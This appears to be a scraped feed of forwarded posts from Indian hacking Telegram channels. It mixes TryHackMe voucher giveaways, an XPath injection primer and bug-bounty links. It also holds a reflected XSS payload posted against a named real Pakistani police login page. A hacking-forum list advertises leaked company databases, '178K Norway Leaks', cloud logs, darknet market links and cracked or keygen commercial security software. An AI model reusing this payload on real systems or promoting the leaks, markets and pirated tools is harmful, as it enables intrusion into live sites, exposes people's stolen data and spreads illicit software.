Forwarded from alex 14324
Forwarded from Bhartiya Hunters🇮🇳 (Founder & CEO ™)
Giving 1 Month TryHackMe Vouchers for only this group members & The Special Thing is :-
You will get TryHackMe 1 Month Voucher * 1 Daily till 15 August 2022
The Timing is fixed, Vouchers will be given at 2 PM Everyday
Enjoy Your Hacking & Give this group a special enthusiasm
Two Vouchers will be given tonight at 8PM
You Know Why We Are Giving this, Because Indians have a huge love, Humanity & Support for Everyone in this Universe, We are Celebrating India's 75th Independence (On 15th August 2022) Remembering our Freedom Fighters:- Bhagat Singh, Subhas Chandra Bose, Sardar Vallabhbhai Patel, Bal Gangadhar Tilak & Many More martyrs that We Don't even Know, SALUTE TO ALL OF THEM🇮🇳
Share this Group Guys, More and More
We are doing more than enough for you But We Should get at least Some Attention & Active Members!
@Indianshunters Crew
Forwarded from CYBER TRICKS ZONE 🇮🇳 (PROT0C0L N1CK)
How to become SOC Analyst in 2022.pdf
317.9 KB
Practical XPath Injection Exploits
When auditing a web application it can be easy to overlook certain types of vulnerabilities if not systematically checking for each individually. Injection exploits are well known, and indeed they are listed as number one in the OWASP Top 10; however, in this article we will discuss an attack that is much less popular than SQL injection: XPath and XQuery injection.
What is XPATH and XQuery?
XPATH is a language that queries an XML document to locate a piece of information, find elements matching a certain pattern or containing an attribute. If the client has access to a piece of the XPath query being used, and this input is not being sanitized, the client will then have access to the entire XML document if they can determine its structure. This is because XPath differs from other database languages in that there are no access controls or user authentication. XQuery is a superset of the XPath language that adds SQL-like syntax as well as some useful functions for querying the document.
One-click account hijack for anyone using Apple sign-in with Reddit | Bug Bounty
https://youtu.be/gLt9GqRrC4I
Forwarded from Bhartiya Hunters🇮🇳 (Founder & CEO ™)
Who Needs TryHackMe Premium Voucher?
[2Months] For Free
Only Needy Person, Who really wants to learn!
We Need Some Proofs:-
1. Your any CTF/Practising Lab Statistics!
2. Your Learning experience & Current Work!
3. Your Identity, Just a Video/Voice call to Identify that Whom We are giving the voucher!
Fill Out This Form!
https://forms.gle/tsw8pts7nJFuzrgo9
At @Indianshunters !
https://avls.islamabadpolice.gov.pk/auth/login
Reflected XSS on Username Field
identity=AmNqkDMcy4pem%22%3e%3cscript%3ealert(1)%3c%2fscript%3eybyqa&password=k1B%21n7u%21L9&captcha=HoZfBT&submit=Login
But not very useful
Forwarded from CYBER TRICKS ZONE 🇮🇳 (PROT0C0L N1CK)
LEARNING CYBER SECURITY/ ETHICAL HACKING YOUTUBE CHANNEL LIST:-
https://github.com/Nickyie/Cybersecurity-Resources/blob/main/Cybersecurity%20YouTube%20Channels/Cybersecurity%20YouTube%20Channels.md
Shared by @cybertrickszone1
Forwarded from CYBER TRICKS ZONE 🇮🇳 (PROT0C0L N1CK)
Best SSRF Bypass List (2022)
-
Copy ALL headers and paste in your request.
-
List: https://t.co/deOSwhXTGp
-
-
#cybersecuritytips #CyberSecurity #CTF #bugbounty #bugbountytips https://t.co/RDGWw6Hnto
Updates On Hackbyte Forum:-
1. aarfragrances.com leak
2. ApacheTomcatScanner: A python script to scan for Apache Tomcat server vulnerabilities
3. Tor2Door and Kingdom Market Darksite Links
4. Xray_Pro_1.9.1_Linux_x64-ZEN
5. Netsparker Enterprise / Acunetix360 Windows Keygen
6. JSubFinder - search webpages & javascript for hidden subdomains and secrets in the given URL
7. XSSER - Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications
8. Logsensor - A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning
9. PCredz - This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface
10. Public penetration testing reports
11. ADDS_Tool - Active Directory Domain Services Tool.
12. SimpleX Chat - the first messaging platform that has no user identifiers (not even random numbers) - v3.1 of iOS and Android apps released - with secret chat groups and server access via Tor.
13. Auditing Crypto Wallets
14. OLUXDATA.COM CLOUD LOGS
15. Novapay Leak
16. teespring.com leak
17. articoolo.com leak
18. wiredbucks.com
19. Cerbero Suite Advanced v5.7.3 x64 cracked ZEN
20. 178K Norway Leaks
All Updates On :- https://bit.ly/3yRyah3